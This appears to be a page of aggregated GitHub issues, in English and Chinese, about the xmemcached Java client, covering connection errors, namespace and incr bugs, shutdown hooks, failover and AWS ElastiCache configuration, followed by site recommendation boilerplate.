}

Then I inject this singleton to my service classes (@Stateless beans) where I simply call cacheService.cacheGet(...)

Is there something wrong with this?

how to make a set of memcached servers have the same consistent hash?

for example , i have a set of servers includes many tomcat servers and memcached servers.now,i want to tell these tomcat servers memcached servers' addresses,and i want to use consistent hash to organize these servers using xmemcached.

the question is how the same memcached server will have the same hash at different tomcat servers?

Hi,我们在使用的时候抛了很多net.rubyeye.xmemcached .exception.MemcachedException: There is no available connection at this moment

net.rubyeye.xmemcached.impl.MemcachedConnector.send(MemcachedConnector.java:501),
net.rubyeye.xmemcached.XMemcachedClient.sendCommand(XMemcachedClient.java:327),
net.rubyeye.xmemcached.XMemcachedClient.sendStoreCommand(XMemcachedClient.java:2534),
net.rubyeye.xmemcached.XMemcachedClient.set(XMemcachedClient.java:1374),
net.rubyeye.xmemcached.XMemcachedClient.set(XMemcachedClient.java:1432),
net.rubyeye.xmemcached.XMemcachedClient.set(XMemcachedClient.java:1419),
com.tencent.mta.statistics.common.service.MemcachedCommand.invoke(MemcachedCommand.java:36),
com.tencent.mta.statistics.common.service.MemcachedService.invoke(MemcachedService.java:58),
com.tencent.mta.statistics.common.service.MemcachedService.set(MemcachedService.java:81),
com.tencent.mta.statistics.guid.GuidBolt.execute(GuidBolt.java:137),
backtype.storm.topology.BasicBoltExecutor.execute(BasicBoltExecutor.java:52),
com.tencent.jstorm.daemon.executor.bolt.BoltExecutor.tupleActionFn(BoltExecutor.java:190),
com.tencent.jstorm.daemon.executor.bolt.BoltExecutor.onEvent(BoltExecutor.java:156),
backtype.storm.utils.DisruptorQueue.consumeBatchToCursor(DisruptorQueue.java:143),
backtype.storm.utils.DisruptorQueue.consumeBatchWhenAvailable(DisruptorQueue.java:114),
com.tencent.jstorm.daemon.executor.bolt.BoltExecutor.run(BoltExecutor.java:128),
com.tencent.jstorm.utils.thread.AsyncLoopRunnable.run(AsyncLoopRunnable.java:51),
java.lang.Thread.run(Thread.java:745)

某一个线程栈如上;

我们会在一个进程进程下边的多个互不相干的线程里起多个memcached client,在这个线程里串行的使用memcached client,中间是不shutdown的;我们的key和value都只有几十字节,不过可能会有些key是多次重复的;

使用的是完全默认的参数配置,请教一下,可能是什么问题?

Memory leak after shutdown

Shutting down the client doesn't free all the memory allocated.
When used in war, multiple sequential redeployments throw OOM in PermGen.

Using Yourkit, I've found the the only reference remained because of shut down hooks registered.

In order to make the shut down process cleaner, these hooks should be unregistered.

在使用incr的时候一直异常

如题目,在使用incr递增的时候一直抛出MemcachedException这个异常。

这是Cache工具类的代码:

public static long incr(String key){
        LOG.info("INCR递增:"+key);
        try {
            return client.incr(key,1,1);
        }catch (TimeoutException e){
            LOG.error("["+key+"]memcache设置递增超时");
        }catch (InterruptedException e){
            LOG.error("["+key+"]memcache设置递增中断异常");
        }catch (MemcachedException e){
            LOG.error("["+key+"]memcache设置递增内部异常");
        }
        return 0;
    }

然后这是使用的时候:

Cache.incr(key);

都是很常规的代码,但就是一直抛出MemcacheException这个异常,有可能是那些原因呢?

getMulti0 bug?

When I used multi-get operation under a namespace like the following test, I got an unexpected result. For example, assuming I already set two key-value pairs <K1, V1> <K2, V2> in a namespace NS, when I use get to fetch the values, I got NULL result.

    String value = "bar";
    String value2 = "bar2"; 

    LOG.info("test namespace now.");
    client.beginWithNamespace("ns");
    Assert.assertTrue(client.set("foo3", 1024, value));
    Assert.assertTrue(client.set("foo4", 1024, value2));
    client.endWithNamespace();

    list.clear();
    list.add("foo3");
    list.add("foo4");
    Map<String, String> simpleResults;
    client.beginWithNamespace("ns");
    simpleResults = client.get(list);
    LOG.info("results with ns: " + simpleResults);
    client.endWithNamespace();

The cause to this issue seems like a bug in the class: net.rubyeye.xmemcached.XMemcachedClient (line #1220).
If users don't set sanitizeKeys to true, the namespace prefix will not prepend to each keys, which causes the above issue.

need a builder for AWSElasticCacheClient?

hello!

thank you for providing support for node autodiscovery in AWS elasticache. i just tested it out and it looks like it's working so far. if our testing continues to go well, it means we won't have to run twemproxy, which is nice!

in my testing i ran into what might be a configuration/building issue. but i'm new to xmemcached, so perhaps i'm not using it right. basically, i want to be able to set configuration values such as setConnectionPoolSize. in our existing code in master, we use the builder pattern given to us via XMemcachedClientBuilder. but AWSElasticCacheClient doesn't have an associated builder.

so i instantiated it manually and tried to call setConnectionPoolSize, but that gives me an IllegalStateError as the constructor for AWSElasticCacheClient starts the connection.

i also want to set the session idle timeout: builder.getConfiguration().setSessionIdleTimeout(15000);

do you have any suggestions for how i can make this work? or do we need a new version that either gives us a builder for AWSElasticCacheClient or, perhaps, allows us to not start the AWSElasticCacheClient at instantiation time but instead manually?

thanks again!

MemcachedClient.get will return null sometimes, but it has a correct value actually.

MemcachedClient.get most times return the correct value ,but will return null sometimes. how can i fix it?
I use Spring Boot.

My Configuration

@Configuration
public class UserMemcacheConfig extends BaseConfig{

    @Value("${memcache.user.host}")
    private String host;
    @Value("${memcache.user.port}")
    private int port;
    @Value("${memcache.user.poolSize}")
    private int poolSize;
    @Value("${memcache.user.connTimeout}")
    private long connTimeout;
    @Value("${memcache.user.opTimeout}")
    private long opTimeout;

    @Bean(name="userMemcacheClient")
    public MemcachedClient getMemcacheClient() throws IOException {
        return this.generateMemcacheClient(host, port, poolSize, connTimeout, opTimeout);
    }
}

My yml properties

memcache:
  default:
    host: 127.0.0.1
    port: 11211
    poolSize: 30
    connTimeout: 1000
    opTimeout: 500
  user:
    host: 10.0.0.248
    port: 9101
    poolSize: 30
    connTimeout: 1000
    opTimeout: 500
  note:
    host: 127.0.0.1
    port: 11211
    poolSize: 30
    connTimeout: 1000
    opTimeout: 500
@Service
public class UserServiceImpl implements UserService{

    @Autowired
    private UserRepository userRepository;

    @Resource
    private MemcachedClient userMemcacheClient;

    @Override
    public User getById(String userId){
        User user = userRepository.findOne(new ObjectId(userId));
        return user;
    }

    @Override
    public String getUserIdBySid(String sid) {
        System.out.println(sid);
        if(StringUtils.isEmpty(sid)) {
            return null;
        }
        String key = String.format(MemcacheKeys.userIdBySid, sid);
        try {
            System.out.println(key);
            String userId = userMemcacheClient.get(key);
            System.out.println(userId);
            if(StringUtils.isEmpty(userId)){
                User user = userRepository.findBySession(sid);
                if(user != null){
                    userId = user.getId().toString();
                    userMemcacheClient.set(key, 100000, userId);
                }
            }
            return userId;
        } catch (InterruptedException e1){
            System.out.println("InterruptedException: " + e1.getMessage());
        } catch (MemcachedException e2){
            System.out.println("MemcachedException: " + e2.getMessage());
        }catch (TimeoutException e3){
            System.out.println("TimeoutException: " + e3.getMessage());
        }
        return null;
    }

}

I use getUserIdBySid with same sid, but sometimes return null.

Do not collapse multiple servers when they resolve to the same IP

When I start XMemcached with multiple server strings that point to the same IP XMemcached will just create a single session.

For example if I have DNS-1 pointing to server-1 and DNS-2 also pointing to server-1 XMemcached will create one session to server-1. If I later point DNS-2 to server-2 and restart server-1 to bump off the connection XMemcached will only heal the session to server-1 but not create one to server-2.

The reason this is important is flexibility. I need to be able to reconfigure servers without having to change the client configuration or restart the client.

ConfigurationPoller is not stopped when you call net.rubyeye.xmemcached.aws.AWSElasticCacheClient#shutdown

hello

We have been using xmemcached client for some time in production and it seems to be working pretty well. We recently discovered that when we call shutdown on net.rubyeye.xmemcached.aws.AWSElasticCacheClient it doesn't actually stop the underlying net.rubyeye.xmemcached.aws.ConfigurationPoller's ThreadPoolExecutor. When looking through the code it seems like there are few different ways to approach it

  1. We remove final from net.rubyeye.xmemcached.XMemcachedClient#shutdown and override it in net.rubyeye.xmemcached.aws.AWSElasticCacheClient and call configPoller.shutdown() there. but since i don't fully understand the design decision for making it final i am not sure if that's a good idea.
  2. Another way to do this would be to add following code to net.rubyeye.xmemcached.aws.ConfigurationPoller:
	public void run() {
		if(client.isShutdown()){
			stop();
			return;
		}

Either one will do the trick and i am happy to make the change and open a PR if you like.

Thanks
Manish

Problem when a memcached server changes IP address

We have to configure our client with failureMode=true, and we are getting errors like this when a memcached server gets down and comes back with a different IP:

net.rubyeye.xmemcached.exception.MemcachedException: Session(192.168.1.41:11211) has been closed
	at net.rubyeye.xmemcached.impl.MemcachedConnector.send(MemcachedConnector.java:512)
	at net.rubyeye.xmemcached.XMemcachedClient.sendCommand(XMemcachedClient.java:317)
	at net.rubyeye.xmemcached.XMemcachedClient.fetch0(XMemcachedClient.java:644)
	at net.rubyeye.xmemcached.XMemcachedClient.get0(XMemcachedClient.java:1085)
	at net.rubyeye.xmemcached.XMemcachedClient.get(XMemcachedClient.java:1043)
	at net.rubyeye.xmemcached.XMemcachedClient.get(XMemcachedClient.java:1054)
	at net.rubyeye.xmemcached.XMemcachedClient.get(XMemcachedClient.java:1076)

The old IP was 192.168.1.41 and the new one is 192.168.1.44. When the server recovers with the new IP we can see logs like:

com.google.code.yanf4j.core.impl.AbstractController:? Add a session: 192.168.1.44:11211

However, the client is still using sessions with the old IP that are closed.

I have been debugging a bit and found that in the class net.rubyeye.xmemcached.impl.MemcachedConnector there is an attribute called sessionMap that contains sessions with both the old and new IP, because the new sessions do not override the old ones, and then all those sessions are passed to the session locator in the method updateSessions(). I think the session locator should receive only the sessions with the new IP.

Please could you take a look?

xmemcached负载均衡问题

请问xmemcached支持负载均衡吗?我的数据量比较大,同时开了几台机器作为写入的队列。xmemcached支不支持均衡的写入不同的机器?

求助,客户端初次建连时,执行build方法耗时很长

每次memcache客户端在初次建连时,执行XMemcachedClientBuilder.build()方法,发现耗时总需要5秒。求助帮忙看下原因,是哪个配置设置有问题吗?

执行日志:
2018-03-07 10:49:50,770 INFO [http-nio-8080-exec-1] net.rubyeye.xmemcached.XMemcachedClient.buildConnector(XMemcachedClient.java:729) XMemcachedClient is using Text protocol
2018-03-07 10:49:55,952 INFO [http-nio-8080-exec-1] com.google.code.yanf4j.nio.impl.SelectorManager.(SelectorManager.java:37) Creating 8 reactors...

cache1
cache2

cache3

Shutdownhook in AbstractController can not be disabled

So, you can disable the shutdownhook in XMemcachedClient, but there is still the one in AbstractController which is not configurable and will always fire, closing the underlying sessions of the client and causing Exceptions if you try to use it during shutdown. I think it should use the same "xmemcached.shutdown.hook.enable" property as the client.

TextCommandFactory should not be declared final

The other (Binary, Kestrel) implementations of CommandFactory are not final.

I am trying to extend the CommandFactory implementations to annotate the constructors with @JsonCreator so they can easily be created and set from a YAML config file.

Failover mode cannot be initialized

Hi!

In 2.4.0 when trying to use failover mode (builder.setFailureMode(true);) and specifying two memcached instances comma separated for the builder, the builder.build() call will fail with the following error:

java.lang.ClassCastException: net.rubyeye.xmemcached.impl.ClosedMemcachedTCPSession cannot be cast to net.rubyeye.xmemcached.networking.MemcachedSession
at net.rubyeye.xmemcached.impl.MemcachedConnector.addSession(MemcachedConnector.java:227)
at net.rubyeye.xmemcached.XMemcachedClient.connect(XMemcachedClient.java:621)
at net.rubyeye.xmemcached.XMemcachedClient.(XMemcachedClient.java:880)
at net.rubyeye.xmemcached.XMemcachedClientBuilder.build(XMemcachedClientBuilder.java:339)

Recommend Projects

  • React photo React

    A declarative, efficient, and flexible JavaScript library for building user interfaces.

  • Vue.js photo Vue.js

    🖖 Vue.js is a progressive, incrementally-adoptable JavaScript framework for building UI on the web.

  • Typescript photo Typescript

    TypeScript is a superset of JavaScript that compiles to clean JavaScript output.

  • TensorFlow photo TensorFlow

    An Open Source Machine Learning Framework for Everyone

  • Django photo Django

    The Web framework for perfectionists with deadlines.

  • D3 photo D3

    Bring data to life with SVG, Canvas and HTML. 📊📈🎉

Recommend Topics

  • javascript

    JavaScript (JS) is a lightweight interpreted programming language with first-class functions.

  • web

    Some thing interesting about web. New door for the world.

  • server

    A server is a program made to process requests and deliver data to clients.

  • Machine learning

    Machine learning is a way of modeling and interpreting data that allows a piece of software to respond intelligently.

  • Game

    Some thing interesting about game, make everyone happy.

Recommend Org

  • Facebook photo Facebook

    We are working to build community through open source technology. NB: members must have two-factor auth.

  • Microsoft photo Microsoft

    Open source projects and samples from Microsoft.

  • Google photo Google

    Google ❤️ Open Source for everyone.

  • D3 photo D3

    Data-Driven Documents codes.